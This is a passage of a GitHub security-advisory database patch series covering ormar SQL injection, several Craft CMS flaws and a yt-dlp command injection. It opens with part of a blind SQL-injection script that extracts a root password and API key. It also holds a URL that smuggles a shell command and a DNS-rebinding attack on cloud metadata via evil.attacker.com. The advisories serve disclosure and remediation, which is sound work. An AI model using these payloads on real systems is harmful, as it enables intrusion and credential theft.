inject(payload)\n print(f\"[Stage 4] Credentials:\\\\n{result}\")\n\n # ── Stage 5: Blind extraction ─────────────────────────────\n payload = f\"LENGTH((SELECT password FROM {target_table} WHERE username='root'))\"\n pw_len = int(inject(payload))\n extracted = \"\"\n request_count = 0\n for pos in range(1, pw_len + 1):\n low, high = 32, 126\n while low <= high:\n mid = (low + high) // 2\n payload = (\n f\"CASE WHEN UNICODE(SUBSTR(\"\n f\"(SELECT password FROM {target_table} \"\n f\"WHERE username='root'),{pos},1))>{mid} \"\n f\"THEN 1 ELSE 0 END\"\n )\n result = inject(payload)\n request_count += 1\n if result == 1:\n low = mid + 1\n else:\n high = mid - 1\n extracted += chr(low)\n sys.stdout.write(f\"\\\\r[Stage 5] Extracting: {extracted}\")\n sys.stdout.flush()\n print(f\"\\\\n[Stage 5] Password extracted: {extracted} ({request_count} requests)\")\n\n # ── Stage 6: Steal API key ────────────────────────────────\n payload = f\"(SELECT api_key FROM {target_table} WHERE username='root')\"\n result = inject(payload)\n print(f\"[Stage 6] Production API key: {result}\")\n\n print(f\"\\\\nTotal HTTP requests: {request_count + 6}\")\n print(\"All data extracted through a single public API endpoint.\")\n\nif __name__ == \"__main__\":\n main()\n```\n\n## Vulnerability Impact\n\nThis attack allows an unauthenticated user to read the entire database contents. 
Any API endpoint that passes user-controlled input to `Model.objects.min()` or `Model.objects.max()` becomes a full SQL injection entry point.\n\nThe attack is confirmed to work with the following database backends:\n\n- SQLite (via aiosqlite)\n- PostgreSQL (via asyncpg) — subquery syntax is identical\n- MySQL (via aiomysql) — subquery syntax is compatible\n\n**Realistic attack scenarios include:**\n\n- **REST APIs** with user-selectable aggregate fields: `GET /items/stats?column=`\n- **GraphQL resolvers** that accept field names as arguments\n- **Dynamic report generators** where users select columns for aggregation\n\nThe vulnerable server in this PoC is based on the **official ormar FastAPI example**, demonstrating that the vulnerability is easily triggered through natural, documented API design patterns. The ormar documentation itself shows this exact usage pattern: `await Book.objects.max(columns=[\"year\"])` ([[ormar aggregations docs](https://collerek.github.io/ormar/queries/aggregations/)](https://collerek.github.io/ormar/queries/aggregations/)).\n\n## Display of attack results\nTerminal 1 — Start server:\n![image](https://github.com/user-attachments/assets/4c8b4a20-75da-4aba-b649-f818e46165dd)\nTerminal 2 — Run attacker:\n\"image\n\"image", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ormar" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.9.9" + }, + { + "fixed": "0.23.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.22.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/collerek/ormar/security/advisories/GHSA-xxh2-68g9-8jqr" + }, + { + "type": "WEB", + "url": "https://github.com/collerek/ormar/commit/a03bae14fe01358d3eaf7e319fcd5db2e4956b16" + }, + { + "type": "PACKAGE", + "url": "https://github.com/collerek/ormar" + }, 
+ { + "type": "WEB", + "url": "https://github.com/collerek/ormar/releases/tag/0.23.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:12:17Z", + "nvd_published_at": null + } +} \ No newline at end of file From 4088f0ca6fc0fda9baa4da98def1c0f8117c267b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:15:35 +0000 Subject: [PATCH 60/77] Publish Advisories GHSA-3jh3-prx3-w6wc GHSA-g3gw-q23r-pgqm --- .../GHSA-3jh3-prx3-w6wc.json | 86 +++++++++++++++++++ .../GHSA-g3gw-q23r-pgqm.json | 65 ++++++++++++++ 2 files changed, 151 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-g3gw-q23r-pgqm/GHSA-g3gw-q23r-pgqm.json diff --git a/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json new file mode 100644 index 0000000000000..ae3676244f566 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json 
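Review bot: The `details` text of the ormar advisory (GHSA-xxh2-68g9-8jqr) carries no remediation guidance: it never names the fixed release that `affected` records (`"fixed": "0.23.0"`) and offers no interim mitigation for applications that cannot upgrade at once. It is also inconsistent about the newest affected release, giving `0.22.0 (latest)` in the version list and `0.21.0` in the two paragraphs that follow, while `last_known_affected_version_range` says `<= 0.22.0`. A short closing section would cover both, for example `## Remediation\n\nUpgrade to ormar 0.23.0 or later. Until then, pass only column names checked against a fixed allow-list of the model's fields to min() and max().`, with the version sentences aligned to `0.22.0`.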
@@ -0,0 +1,86 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jh3-prx3-w6wc", + "modified": "2026-02-23T22:15:03Z", + "published": "2026-02-23T22:15:03Z", + "aliases": [ + "CVE-2026-27126" + ], + "summary": "Craft CMS has Stored XSS in Table Field via \"HTML\" Column Type", + "details": "A stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `html` column type. The application fails to sanitize the input, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.\n\n## Prerequisites\n* An administrator account\n* `allowAdminChanges` must be enabled in production, which is [against our security recommendations](https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production).\n\n## Steps to Reproduce\n1. Navigate to **Settings** → **Fields** and create a new field with Type: **Table**\n1. Add a **Column Heading** and set **Column Type** to `Single-line text`\n - **Note:** The vulnerable **Column Type** is `html`, but it's not available in the UI dropdown.\n1. In **Default Values** section, add a row with the following payload:\n ```html\n \n ```\n1. Enable `Static Rows`\n1. Intercept the **Save Field** request using a proxy tool (e.g., Burp Suite) or use `cURL` directly\n1. Modify the request body and change the `types[craft-fields-Table][columns][col3][type]` parameter from `singleline` to `html`\n1. Forward the request to save the field\n1. Use the field in any object (e.g. user profile fields) → then visit the any user's profile\n1. Notice the XSS execution\n1. 
The XSS will also trigger when an administrator attempts to edit this field, as the malicious payload is executed within the field configuration page, too.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0-RC1" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:15:03Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g3gw-q23r-pgqm/GHSA-g3gw-q23r-pgqm.json b/advisories/github-reviewed/2026/02/GHSA-g3gw-q23r-pgqm/GHSA-g3gw-q23r-pgqm.json new file mode 100644 index 0000000000000..7306b450b6433 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-g3gw-q23r-pgqm/GHSA-g3gw-q23r-pgqm.json 
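Review bot: The CVSS v4 vector in `severity` carries `PR:L`, while the `details` text of this same record lists "An administrator account" as a prerequisite, so the two disagree. If admin rights really are required, the metric would be `PR:H`, i.e. `"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"`. The `MODERATE` label in `database_specific.severity` should then be re-derived from the corrected vector rather than kept by hand. Consumers that triage on the vector alone would otherwise treat this as reachable by any low-privileged account.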
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3gw-q23r-pgqm", + "modified": "2026-02-23T22:13:58Z", + "published": "2026-02-23T22:13:58Z", + "aliases": [ + "CVE-2026-26331" + ], + "summary": "yt-dlp: Arbitrary Command Injection when using the `--netrc-cmd` option", + "details": "### Summary\nWhen yt-dlp's `--netrc-cmd` command-line option (or `netrc_cmd` Python API parameter) is used, an attacker could achieve arbitrary command injection on the user's system with a maliciously crafted URL.\n\n### Impact\nyt-dlp maintainers assume the impact of this vulnerability to be high for anyone who uses `--netrc-cmd` in their command/configuration or `netrc_cmd` in their Python scripts. Even though the maliciously crafted URL itself will look very suspicious to many users, it would be trivial for a maliciously crafted webpage with an inconspicuous URL to covertly exploit this vulnerability via HTTP redirect. Users without `--netrc-cmd` in their arguments or `netrc_cmd` in their scripts are unaffected. No evidence has been found of this exploit being used in the wild.\n\n### Patches\nyt-dlp version 2026.02.21 fixes this issue by validating all netrc \"machine\" values and raising an error upon unexpected input.\n\n### Workarounds\nIt is recommended to upgrade yt-dlp to version 2026.02.21 as soon as possible.\n\nUsers who are unable to upgrade should avoid using the `--netrc-cmd` command-line option (or `netrc_cmd` Python API parameter), or they should at least not pass a placeholder (`{}`) in their `--netrc-cmd` argument.\n\n### Details\nyt-dlp's `--netrc-cmd` option can be used to run any arbitrary shell command to retrieve site login credentials so that the user doesn't have to store the credentials as plaintext in the filesystem. The `--netrc-cmd` argument is a shell command with an optional placeholder (`{}`). 
If the placeholder is present in the argument, it is replaced with the netrc \"machine\" value, which specifies the site for which login credentials are needed.\n\nThe netrc \"machine\" value is usually explicitly defined in yt-dlp's extractor code for a given site. However, yt-dlp has four extractors where the netrc \"machine\" value needs to be dynamically sourced from the site's hostname. And in three of those extractors (`GetCourseRuIE`, `TeachableIE` and `TeachableCourseIE`), wildcard matches are allowed for one or more subdomains of the hostname. This can result in a netrc \"machine\" value that contains special shell characters.\n\nThe `--netrc-cmd` argument is executed by a modified version of Python's `subprocess.Popen` with `shell=True`, which means that any special characters may be interpreted by the host shell, potentially leading to arbitrary command injection.\n\nHere is an example of maliciously crafted URL input that exploits the vulnerability:\n\n```cmd\n> yt-dlp --netrc-cmd \"echo {}\" \"https://;echo pwned>&2;#.getcourse.ru/video\"\n[GetCourseRu] Executing command: echo getcourseru\nWARNING: [GetCourseRu] Failed to parse .netrc: bad toplevel token 'getcourseru' (-, line 2)\n[GetCourseRu] Extracting URL: https://;echo pwned>&2;#.getcourse.ru/video\n[GetCourseRu] Executing command: echo ;echo pwned>&2;\npwned\n[GetCourseRu] No authenticators for ;echo pwned>&2;\n[GetCourseRu] video: Downloading webpage\n```\n\nAlthough only 3 of yt-dlp's extractors are directly susceptible to this attack, yt-dlp's \"generic\" extractor will follow HTTP redirects and try to match the resulting URL with one of the dedicated extractors. This means that any URL processed by the generic extractor could ultimately lead to a maliciously crafted URL that is matched by one of the vulnerable extractors. 
Hypothetically, an attacker could create a website with an inconspicuous URL and legitimate-looking media content that would serve an HTTP redirect to a maliciously crafted URL when it detects a request from yt-dlp.\n\n\n### References\n- https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-g3gw-q23r-pgqm\n- https://nvd.nist.gov/vuln/detail/CVE-2026-26331\n- https://github.com/yt-dlp/yt-dlp/releases/tag/2026.02.21\n- https://github.com/yt-dlp/yt-dlp/commit/1fbbe29b99dc61375bf6d786f824d9fcf6ea9c1a", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "yt-dlp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2023.06.21" + }, + { + "fixed": "2026.02.21" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-g3gw-q23r-pgqm" + }, + { + "type": "WEB", + "url": "https://github.com/yt-dlp/yt-dlp/commit/1fbbe29b99dc61375bf6d786f824d9fcf6ea9c1a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/yt-dlp/yt-dlp" + }, + { + "type": "WEB", + "url": "https://github.com/yt-dlp/yt-dlp/releases/tag/2026.02.21" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:13:58Z", + "nvd_published_at": null + } +} \ No newline at end of file From 819404a40c9244d0f19f0c1e06a8dd8ac78610a8 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:17:21 +0000 Subject: [PATCH 61/77] Publish Advisories GHSA-6fx5-5cw5-4897 GHSA-gp2f-7wcm-5fhx --- .../GHSA-6fx5-5cw5-4897.json | 86 ++++++++++++++ .../GHSA-gp2f-7wcm-5fhx.json | 110 ++++++++++++++++++ 2 files changed, 196 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-6fx5-5cw5-4897/GHSA-6fx5-5cw5-4897.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-gp2f-7wcm-5fhx/GHSA-gp2f-7wcm-5fhx.json diff --git a/advisories/github-reviewed/2026/02/GHSA-6fx5-5cw5-4897/GHSA-6fx5-5cw5-4897.json b/advisories/github-reviewed/2026/02/GHSA-6fx5-5cw5-4897/GHSA-6fx5-5cw5-4897.json new file mode 100644 index 0000000000000..b4e1b92bc4543 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-6fx5-5cw5-4897/GHSA-6fx5-5cw5-4897.json 
@@ -0,0 +1,86 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fx5-5cw5-4897", + "modified": "2026-02-23T22:16:22Z", + "published": "2026-02-23T22:16:22Z", + "aliases": [ + "CVE-2026-27128" + ], + "summary": "Craft CMS Race condition in Token Service potentially allows for token usage greater than the token limit", + "details": "A Time-of-Check-Time-of-Use (TOCTOU) race condition exists in Craft CMS’s token validation service for tokens that explicitly set a limited usage. The `getTokenRoute()` method reads a token’s usage count, checks if it’s within limits, then updates the database in separate non-atomic operations. By sending concurrent requests, an attacker can use a single-use impersonation token multiple times before the database update completes.\n\nTo make this work, an attacker needs to obtain a valid user account impersonation URL with a non-expired token via some other means and exploit a race condition while bypassing any rate-limiting rules in place.\n\nFor this to be a privilege escalation, the impersonation URL must include a token for a user account with more permissions than the current user.\n\n## References\n\nhttps://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0-RC1" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + } + ], + "references": [ + { + 
"type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-6fx5-5cw5-4897" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:16:22Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-gp2f-7wcm-5fhx/GHSA-gp2f-7wcm-5fhx.json b/advisories/github-reviewed/2026/02/GHSA-gp2f-7wcm-5fhx/GHSA-gp2f-7wcm-5fhx.json new file mode 100644 index 0000000000000..9dd0ec22ecabd --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-gp2f-7wcm-5fhx/GHSA-gp2f-7wcm-5fhx.json 
@@ -0,0 +1,110 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gp2f-7wcm-5fhx", + "modified": "2026-02-23T22:16:01Z", + "published": "2026-02-23T22:16:01Z", + "aliases": [ + "CVE-2026-27127" + ], + "summary": "Craft CMS has Cloud Metadata SSRF Protection Bypass via DNS Rebinding", + "details": "## Summary\n\nThe SSRF validation in Craft CMS’s GraphQL Asset mutation performs DNS resolution **separately** from the HTTP request. This Time-of-Check-Time-of-Use (TOCTOU) vulnerability enables DNS rebinding attacks, where an attacker’s DNS server returns different IP addresses for validation compared to the actual request.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)) that allows access to all blocked IPs, not just IPv6 endpoints.\n\n## Severity\n\nBypass of cloud metadata SSRF protection for all blocked IPs\n\n## Required Permissions\n\nExploitation requires GraphQL schema permissions for:\n- Edit assets in the `` volume\n- Create assets in the `` volume\n\nThese permissions may be granted to:\n- Authenticated users with appropriate GraphQL schema access\n- Public Schema (if misconfigured with write permissions)\n\n---\n\n## Technical Details\n\n### Vulnerable Code Flow\n\nThe code at `src/gql/resolvers/mutations/Asset.php` performs two separate DNS lookups:\n\n```php\n// VALIDATION PHASE: First DNS resolution at time T1\nprivate function validateHostname(string $url): bool\n{\n $hostname = parse_url($url, PHP_URL_HOST);\n $ip = gethostbyname($hostname); // DNS Lookup #1 - Returns safe IP\n\n if (in_array($ip, [\n '169.254.169.254', // AWS, GCP, Azure IMDS\n '169.254.170.2', // AWS ECS metadata\n '100.100.100.200', // Alibaba Cloud\n '192.0.0.192', // Oracle Cloud\n ])) {\n return false; // Check passes - IP looks safe\n }\n return true;\n}\n\n// ... 
time gap between validation and request ...\n\n// REQUEST PHASE: Second DNS resolution at time T2 (inside Guzzle)\n$response = $client->get($url); // DNS Lookup #2 - Guzzle resolves DNS AGAIN\n // Now returns 169.254.169.254!\n```\n\n### Root Cause\n\nTwo separate DNS lookups occur:\n1. **Validation**: `gethostbyname()` in `validateHostname()`\n2. **Request**: Guzzle's internal DNS resolution via libcurl\n\nAn attacker controlling a DNS server can return different IPs for each query.\n\n### Bypass Mechanism\n\n```\n+-----------------------------------------------------------------------------+\n| Attacker's DNS Server: evil.attacker.com |\n+-----------------------------------------------------------------------------+\n| Query 1 (Validation - T1): |\n| Request: A record for evil.attacker.com |\n| Response: 1.2.3.4 (safe IP, TTL: 0) |\n| Result: Validation PASSES |\n+-----------------------------------------------------------------------------+\n| Query 2 (Guzzle Request - T2): |\n| Request: A record for evil.attacker.com |\n| Response: 169.254.169.254 (metadata IP, TTL: 0) |\n| Result: Request goes to blocked IP -> CREDENTIALS STOLEN |\n+-----------------------------------------------------------------------------+\n```\n\n---\n\n## Target Endpoints via DNS Rebinding\n\nDNS rebinding allows access to all blocked IPs:\n\n| Target | Rebind To | Impact |\n|--------|-----------|--------|\n| **AWS IMDS** | `169.254.169.254` | IAM credentials, instance identity |\n| **AWS ECS** | `169.254.170.2` | Container credentials |\n| **GCP Metadata** | `169.254.169.254` | Service account tokens |\n| **Azure Metadata** | `169.254.169.254` | Managed identity tokens |\n| **Alibaba Cloud** | `100.100.100.200` | Instance credentials |\n| **Oracle Cloud** | `192.0.0.192` | Instance metadata |\n| **Internal Services** | `127.0.0.1`, `10.x.x.x` | Internal APIs, databases |\n\n---\n\n### Attack Scenario\n\n1. Attacker sets up DNS server with alternating responses\n2. 
Attacker sends mutation with `url: \"http://evil.attacker.com/latest/meta-data/\"`\n3. First DNS query returns safe IP (e.g., `1.2.3.4`) → validation passes\n4. Second DNS query returns metadata IP (`169.254.169.254`) → request to metadata\n5. Attacker retrieves credentials from ANY cloud provider\n6. **Attacker can now achieve code execution by creating new instances with their SSH key**\n\n---\n\n## Remediation\n\n### Fix: DNS Pinning with CURLOPT_RESOLVE\n\nPin the DNS resolution - use the same resolved IP for both validation and request:\n\n```php\nprivate function validateHostname(string $url): bool\n{\n $hostname = parse_url($url, PHP_URL_HOST);\n\n // Resolve once\n $ip = gethostbyname($hostname);\n\n // Validate the resolved IP\n if (in_array($ip, [\n '169.254.169.254', '169.254.170.2',\n '100.100.100.200', '192.0.0.192',\n ])) {\n return false;\n }\n\n // Store for later use\n $this->pinnedDNS[$hostname] = $ip;\n\n return true;\n}\n\n// When making the request - CRITICAL: Use pinned IP\nprotected function makeRequest(string $url): ResponseInterface\n{\n $hostname = parse_url($url, PHP_URL_HOST);\n $ip = $this->pinnedDNS[$hostname] ?? null;\n\n $options = [];\n if ($ip) {\n // Force Guzzle/curl to use the SAME IP we validated\n $options['curl'] = [\n CURLOPT_RESOLVE => [\n \"$hostname:80:$ip\",\n \"$hostname:443:$ip\"\n ]\n ];\n }\n\n return $this->client->get($url, $options);\n}\n```\n\n### Alternative: Single Resolution with Immediate Use\n\n```php\n// Resolve to IP and use IP directly in URL\n$ip = gethostbyname($hostname);\n\nif (in_array($ip, $blockedIPs)) {\n return false;\n}\n\n// Make request directly to IP with Host header\n$client->get(\"http://$ip\" . 
parse_url($url, PHP_URL_PATH), [\n 'headers' => [\n 'Host' => $hostname\n ]\n]);\n```\n\n### Additional Mitigations\n\n| Mitigation | Description |\n|------------|-------------|\n| DNS Pinning (CURLOPT_RESOLVE) | Force same IP for validation and request |\n| Single IP-based request | Use resolved IP directly in URL |\n| Implement IMDSv2 | Requires token header (infrastructure-level) |\n| Network egress filtering | Block metadata IPs at network level |\n\n---\n\n## Resources\n\n- https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575\n- [GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc) - Original SSRF vulnerability (CVE-2025-68437)\n- [DNSrebinder](https://github.com/mogwailabs/DNSrebinder) - Lightweight Python DNS server for testing DNS rebinding vulnerabilities; responds with legitimate IP for first N queries, then rebinds to target IP\n- [Singularity DNS Rebinding Tool](https://github.com/nccgroup/singularity)\n- [rbndr DNS Rebinding Service](https://github.com/taviso/rbndr)\n- [DNS Rebinding Attacks Explained](https://unit42.paloaltonetworks.com/dns-rebinding/)\n- [CURLOPT_RESOLVE Documentation](https://curl.se/libcurl/c/CURLOPT_RESOLVE.html)\n- OWASP SSRF Prevention Cheat Sheet", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.5.0" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } 
+ } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-gp2f-7wcm-5fhx" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575" + }, + { + "type": "WEB", + "url": "https://curl.se/libcurl/c/CURLOPT_RESOLVE.html" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + }, + { + "type": "WEB", + "url": "https://github.com/mogwailabs/DNSrebinder" + }, + { + "type": "WEB", + "url": "https://github.com/nccgroup/singularity" + }, + { + "type": "WEB", + "url": "https://github.com/taviso/rbndr" + }, + { + "type": "WEB", + "url": "https://unit42.paloaltonetworks.com/dns-rebinding" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:16:01Z", + "nvd_published_at": null + } +} \ No newline at end of file From 2f2f37a8ccfbd556d3e24e7e3fa4095cacddc6cc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:21:12 +0000 Subject: [PATCH 62/77] Publish Advisories GHSA-5g94-c2wx-8pxw GHSA-5mx2-w598-339m GHSA-6p9p-q6wh-9j89 GHSA-996q-pr4m-cvgq --- .../2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json | 1 + .../2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json | 8 ++++++-- .../2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json | 3 ++- .../2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json | 8 ++++++-- 4 files changed, 15 insertions(+), 5 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json index 40168473dad55..78729e2a9fa3c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json 
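Review bot: `database_specific.cwe_ids` lists only `CWE-367`, although the summary and details describe a bypass of SSRF protection, so tooling that filters advisories by CWE will not surface this record under server-side request forgery. Adding the SSRF class next to the race-condition one would fix that: `"cwe_ids": ["CWE-367", "CWE-918"]`. Other patches in this series widen CWE lists the same way, for example the one adding `CWE-22` beside `CWE-23` in GHSA-5g94-c2wx-8pxw. Separately, the remediation sample in `details` matches the resolved address against four literal IPs only, while the same text names `127.0.0.1` and `10.x.x.x` as rebinding targets. Readers adapting that sample should check the pinned address against full loopback, link-local and private ranges.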
+++ b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json @@ -55,6 +55,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-23" ], "severity": "HIGH", diff --git a/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json index 9c649f9e47e07..fc0753303755a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json +++ b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5mx2-w598-339m", - "modified": "2026-02-18T22:40:09Z", + "modified": "2026-02-23T22:20:29Z", "published": "2026-02-18T22:40:09Z", "aliases": [ "CVE-2026-27022" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/langchain-ai/langgraphjs/security/advisories/GHSA-5mx2-w598-339m" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27022" + }, { "type": "WEB", "url": "https://github.com/langchain-ai/langgraphjs/pull/1943" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:40:09Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:28Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json b/advisories/github-reviewed/2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json index 8170c5c8c686f..65045e70e0566 100644 --- a/advisories/github-reviewed/2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json +++ b/advisories/github-reviewed/2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json @@ -55,7 +55,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-770" ], "severity": "MODERATE", "github_reviewed": true, 
